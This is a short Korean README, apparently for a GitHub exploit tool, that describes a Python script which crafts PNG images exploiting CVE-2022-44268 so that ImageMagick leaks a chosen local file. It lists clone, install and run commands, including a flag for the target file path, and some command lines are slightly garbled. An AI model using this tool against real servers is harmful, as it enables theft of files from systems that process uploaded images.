
CVE-2022-44268을 악용하여 ImageMagick 메타데이터 구문 분석을 통해 로컬 파일 경로를 삽입하고 유출하는 PNG 이미지를 생성하는 Python 스크립트.
이 Python 스크립트는 Pillow 라이브러리를 사용하여 특정 색상으로 채워진 PNG 이미지를 생성하고 파일 경로를 메타데이터로 포함합니다.
pip install pillow)git clone https://github.com/NataliSemi/-CVE-2022-44268.git
cd -CVE-2022-44268.git
pip install pillow
pip install pypng
python create_image.py
생성된 이미지: 스크립트를 실행하면 저장소 디렉토리에 image.png라는 이미지 파일이 생성됩니다.
python create_image.py -f /path/to/local/file.txt -o output_image.png